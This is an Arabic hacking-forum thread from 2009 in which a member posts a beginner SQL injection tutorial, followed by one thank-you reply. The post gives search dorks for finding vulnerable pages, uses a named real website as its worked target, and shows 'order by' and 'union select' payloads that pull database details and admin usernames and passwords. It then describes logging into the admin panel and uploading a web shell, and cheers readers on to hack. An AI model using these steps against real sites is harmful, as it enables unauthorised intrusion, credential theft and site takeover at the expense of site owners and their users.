التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 11-13-2009, 01:50 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






KiLLer HaCkEr غير متواجد حالياً

إرسال رسالة عبر ICQ إلى KiLLer HaCkEr إرسال رسالة عبر MSN إلى KiLLer HaCkEr

 

 

إحصائية الترشيح

عدد النقاط : 10
KiLLer HaCkEr is on a distinguished road

.......... [ الدرس الآول ] شرح بالفيديو + بالتفصيل = ثغرة SQL Injection [ للمبتدئين ] ..


بسم الله الرحمن الرحيــم ..،،

عدنآ إليكم .. بعد غيبآت طويله ..،،

والمعذرهـ للكل .. !~


اليوم وانا جآلس وطفشآن ... وقلت خلينآ نسوي خير .. ^)^ .. وفكرت في الشيء هذآ .. ونزلت لكم درس من ثغرة SqL لعيون المبتدئين ..

اليوم بشرح لكم شرح كتآبي .. + ... شرح بالفيديو ...


.........................................

اولاً ..:/ نبتدىء في الكتآبي ..

وهذآ الملف فيهآ اوامر اكواد او ثغرآت لتحقن الموقع .. مسآعده مني لكم .. يآلبى قلوبكم

آضغط على آسمي ..

~::: [ bO N4sSeR ] :::~

-----------------


اولا .. عندك هذآ الآكواد لبحث المواقع المصآبه بالثغره ..

كود PHP:
allinanchor: article.php?id=
allinanchor: index.php?id=
allinanchor: news_view.php?id=



فمثلاً .. نفرض هذآ الكود ..


allinanchor: news_view.php?id=

نبحثه في قوقل ..

هكذآ يصير ..





ويوجد عدة مواقع كثيره منهآ مصابه ومنهآ غير مصآبه ..

كيف نعرف ان المواقع مصآبه آو غير مصآبه .. ؟

نذهب نختآر اي موقع من المواقع التي ضهرت في قوقل

نفترض هذآ الموقع ..


كود PHP:
http://www.walnutacres.com/news_view.php?id=14



كيف نعرف انها مصابه او لا .. ؟

نغير في الرآبط نضيف عليهآ هذآ الرمز علامة التنصيص ( ' )

فيصبح الرآبط هكذآ ..





فضهرت الصفحه مختلفه عن الآول .. / إذاً الموقع مصآب .. وإذا لم يختلف بشيء .. الموقع سليم من الثغره sql

انا عندي الموقع ظهرت مختلفه .. إذا الموقع مصآب بالثغره

فمآذآ نفعل ..؟

نضيف عليهآ هذآ الكود .. آمرين فقط .. ونعرف مسآر هذي اللوحه ..


كود PHP:
+order+by+2



فيصبح الرآبط هكذآ ..


كود PHP:
http://www.walnutacres.com/news_view.php?id=14+order+by+2




إذن لن ظهر الجداول او الاعمده لكي اعرف اي مسآر اليوزر والبآسورد آو بمى يسمى القواعد البيانات ..


بنغير رقم 2 إلى رقم 1 وإذا لم تظهر نغير من رقم 1 إلى 3 .... إلخ وهكذآ .. لمآ يطلع الصفحه القواعد مكان اليوزر يعني ..

انا ظهرت عندي هكذآ ..





رقم 4

كيف نطلع اليوزر والبآسورد من هذآ التعقد .. ؟ مآذا نفعل ..؟

نبدل الآكواد التي اضعناها هنآ order+by <- نضع بدآلهآ هكذا +union+select

وثم يصبح الرابط هكذآ ..





ولن تنسى الاشاره السالبه بعد كلمة id = - (الرقم ) هكذآ ..

ومن ثم نضيف عليهآ ثغره للإستخراج اسم القاعده واصدآرهآ ..


كود PHP:
unhex(hex(concat(database(),0x3a,version(),0x3a,user()))




فيصبح هكذآ ..




فيصبح المسآر على رقم 1 اسم القاعده واصدآرهآ

والآن نبي نطلع اليوزر والباسورد اللوحة التحكم تبع الموقع ..

نضيف عليهآ ايضاً ثغره او كود ..

لكي يستخرج لنآ اليوزر والباسورد .. هكذا ..

طبعاً هذا اليوزر
كود PHP:
unhex(hex(user))



وهذا الباسورد
كود PHP:
unhex(hex(pass))



فنضع رقم 1 اليوزر ورقم 2 الباسورد

فيصبح الرابط هكذآ ..




ومن ثم تذهب إلى لوحة الادآره هكذآ ..



فيصبح دخولك إلى لوحة التحكم وثم ارفع الشل وخلاص ومبروك الدعس .. ^)^

للآنه اغلبيه اللوحه التحكم بيكون هذآ المسآر .. بعد com/admin وانتهينآ ..

وعندي لكم مفآجئه ..

هذي هدآيه مني لكم ..


&



&


يالله تمتعوا بالآختراق ..

-----------------------------------------------------------------------------


وثآنــيــاً .. / شــرح بالفيديو ..


حبيت اوضحلكم تطبيق بالفيديو مفصل مثل ماشرحنآ لكم بالكتآبه ...

[ والمقطع يطول اشوي للآنه شآرحه بالتفصيل ]

آضغط على آسمي ..


~::: [ bO N4sSer ] :::~


وإن شاء الله بتكون الدرس مفهوووم ..

ويآليت كل واحد منكم الدعآء لي ولوالدي ..

وبالتوفيق حآيبي ..

وآي استفسآر انا حآظر ..


احترامي لكم ..:

بــــونآصـــر

KiLLer HaCkEr




-----------------------------------------------------------------------

طبعاً إهدآء خآص

إلى العنآكب وآعضآءهـ ..





F hg]vs hgN,g D avp fhgtd]d, + fhgjtwdg = eyvm SQL Injection gglfj]zdk

التوقيع


-----------------------------------------------

* ضويت الشمع بيديني .. حبست بوقتها انفاسي

-----------------------------------------------

 

   

رد مع اقتباس
قديم 11-13-2009, 02:18 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية zooro144
 

 

 
إحصائية العضو





zooro144 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
zooro144 is on a distinguished road

افتراضي


مشكووررر ع الشرح الوافي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
شرح كيفية تكوين ثغرة الصورة بالميتاسبلوت بالتفصيل الممل ابو بدر MetaSploit 22 09-13-2011 03:21 AM
شرح بالفيديو لبرنامج البيرفوست + انشاء السيرفر للمبتدئين هاكر مغربي قســم إختــراق الأجهــزة 5 10-07-2010 06:09 PM
شرح بالفيديو حصرياً عن السكول انجكت SQL Injection Dersleri NEVER HaCKEr SQL قواعد البيانات 1 01-30-2010 02:34 PM
الهندسة العكسية للمبتدئين = الدرس الأول = Reversing for Newbies Mr.ALsa7eR قســم إختــراق الأجهــزة 13 09-07-2009 09:15 PM


الساعة الآن 10:48 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0